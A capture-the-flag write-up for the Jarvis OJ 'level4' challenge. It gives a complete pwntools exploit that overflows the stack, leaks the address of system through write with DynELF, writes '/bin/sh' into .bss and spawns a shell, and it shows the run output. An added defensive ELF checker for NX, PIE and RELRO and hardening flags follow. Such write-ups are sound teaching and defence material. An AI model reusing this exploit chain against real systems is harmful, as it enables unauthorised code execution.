The binary has NX protection enabled, and the vulnerability is easy to find.

No libc is provided, and the binary has no system and no "/bin/sh" string, but it does import read and write. So we borrow pwntools' built-in DynELF module to do the leaking:

1. Use write to leak the address of system.
2. Use read to write the string "/bin/sh" into the bss segment.
3. Call system("/bin/sh").

The exp is as follows:
```python
#!/usr/bin/python
from pwn import *
from LibcSearcher import *  # imported in the original but not used below

io = remote("pwn2.jarvisoj.com", "9880")
# io = process('./level4')
elf = ELF('level4')
read_plt = elf.plt['read']
write_plt = elf.plt['write']
# start_addr = elf.symbols['start']
start_addr = 0x08048350  # _start: returning here restarts the program so the overflow can be reused
bss_addr = 0x0804A024    # writable .bss location that will hold "/bin/sh"

def leak(addr):
    # Padding up to the return address, then write(1, addr, 4) and return to _start;
    # DynELF calls this repeatedly to walk the libc that is mapped in memory.
    payload = 'a' * 0x88 + 'a' * 4 + p32(write_plt) + p32(start_addr) + p32(1) + p32(addr) + p32(4)
    io.sendline(payload)
    leak_addr = io.recv(4)
    return leak_addr

d = DynELF(leak, elf=elf)
sys_addr = d.lookup('system', 'libc')

# read(0, bss_addr, 8) and return to _start; the following send supplies the string
payload2 = 'a' * 0x88 + 'a' * 4 + p32(read_plt) + p32(start_addr) + p32(0) + p32(bss_addr) + p32(8)
io.sendline(payload2)
io.send("/bin/sh\x00")

# system("/bin/sh") with a dummy return address
payload3 = 'a' * 0x88 + 'a' * 4 + p32(sys_addr) + p32(0xaaaa) + p32(bss_addr)
io.sendline(payload3)
io.interactive()
```
```
kk@ubuntu:~/Desktop/black/Jarvis Oj/level4$ python exp.py
[+] Opening connection to pwn2.jarvisoj.com on port 9880: Done
[*] '/home/kk/Desktop/black/Jarvis Oj/level4/level4'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
[+] Loading from '/home/kk/Desktop/black/Jarvis Oj/level4/level4': 0xf7771930
[+] Resolving 'system' in 'libc.so': 0xf7771930
[!] No ELF provided. Leaking is much faster if you have a copy of the ELF being leaked.
[*] Trying lookup based on Build ID: de799a85b2ebc2929eb4585f009d0c5e6211f2f8
[-] Downloading 'https://gitlab.com/libcdb/libcdb/raw/master/hashes/build_id/de799a85b2ebc2929eb4585f009d0c5e6211f2f8': Got code 404
[!] Could not fetch libc for build_id de799a85b2ebc2929eb4585f009d0c5e6211f2f8
[*] .gnu.hash/.hash, .strtab and .symtab offsets
[*] Found DT_GNU_HASH at 0xf7742dd8
[*] Found DT_STRTAB at 0xf7742de0
[*] Found DT_SYMTAB at 0xf7742de8
[*] .gnu.hash parms
[*] hash chain index
[*] hash chain
[*] Switching to interactive mode
$ ls
flag
level4
```
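Added example, not code from the original write-up: a Python 3 checker that reads the same mitigation fields pwntools' checksec prints above (NX from PT_GNU_STACK, PIE from ET_DYN, RELRO from PT_GNU_RELRO plus BIND_NOW) directly from ELF32 program headers using only the standard library, so a defender can flag builds whose fixed PLT/.bss addresses and writable GOT leave them open to the leak-and-call chain used here. The images it checks are constructed by build_sample_elf and are not loadable; the real level4 binary is not needed.

```python
import struct

PT_DYNAMIC, PT_GNU_STACK, PT_GNU_RELRO = 2, 0x6474E551, 0x6474E552
PF_X, ET_DYN = 1, 3
DT_NULL, DT_BIND_NOW, DT_FLAGS, DT_FLAGS_1 = 0, 24, 30, 0x6FFFFFFB
DF_BIND_NOW, DF_1_NOW = 0x8, 0x1

def elf32_mitigations(data):
    """Report NX, PIE and RELRO for a little-endian ELF32 image given as bytes."""
    if data[:4] != b"\x7fELF" or data[4:6] != b"\x01\x01":
        raise ValueError("not a little-endian 32-bit ELF")
    e_type, = struct.unpack_from("<H", data, 16)
    e_phoff, = struct.unpack_from("<I", data, 28)
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 42)
    nx, relro_seg, dyn = False, False, (0, 0)  # no PT_GNU_STACK means an executable stack on i386
    for i in range(e_phnum):
        p_type, p_off, _, _, p_filesz, _, p_flags, _ = struct.unpack_from("<8I", data, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)
        elif p_type == PT_GNU_RELRO:
            relro_seg = True
        elif p_type == PT_DYNAMIC:
            dyn = (p_off, p_off + p_filesz)
    bind_now, off = False, dyn[0]  # Full RELRO also needs eager binding so the GOT can be made read-only
    while off + 8 <= dyn[1]:
        tag, val = struct.unpack_from("<iI", data, off)
        off += 8
        if tag == DT_NULL:
            break
        if tag == DT_BIND_NOW or (tag == DT_FLAGS and val & DF_BIND_NOW) or (tag == DT_FLAGS_1 and val & DF_1_NOW):
            bind_now = True
    relro = "Full" if relro_seg and bind_now else "Partial" if relro_seg else "None"
    return {"nx": nx, "pie": e_type == ET_DYN, "relro": relro}

def build_sample_elf(e_type, stack_exec, relro_seg, bind_now):
    """Constructed, non-loadable ELF32 image carrying only the fields the checker reads."""
    dynamic = (struct.pack("<iI", DT_FLAGS, DF_BIND_NOW) if bind_now else b"") + struct.pack("<iI", DT_NULL, 0)
    n_ph = 3 if relro_seg else 2
    dyn_off = 52 + 32 * n_ph  # layout: 52-byte header, program headers, then the dynamic entries
    phdrs = [struct.pack("<8I", PT_DYNAMIC, dyn_off, 0, 0, len(dynamic), len(dynamic), 6, 4),
             struct.pack("<8I", PT_GNU_STACK, 0, 0, 0, 0, 0, 6 | (PF_X if stack_exec else 0), 16)]
    if relro_seg:
        phdrs.append(struct.pack("<8I", PT_GNU_RELRO, 0, 0, 0, 0, 0, 4, 1))
    header = b"\x7fELF\x01\x01\x01" + b"\x00" * 9 + struct.pack(
        "<HHIIIIIHHHHHH", e_type, 3, 1, 0x8048350, 52, 0, 0, 52, 32, n_ph, 40, 0, 0)
    return header + b"".join(phdrs) + dynamic

# Profile matching the level4 checksec output (NX on, Partial RELRO, no PIE) beside a hardened build
LEVEL4_LIKE = build_sample_elf(2, False, True, False)
HARDENED = build_sample_elf(ET_DYN, False, True, True)
```

A Partial RELRO, non-PIE result is exactly the profile that lets the PLT and .bss addresses in the exp above be hard-coded; building with -fPIE -pie and -Wl,-z,relro,-z,now turns both fields to their hardened values.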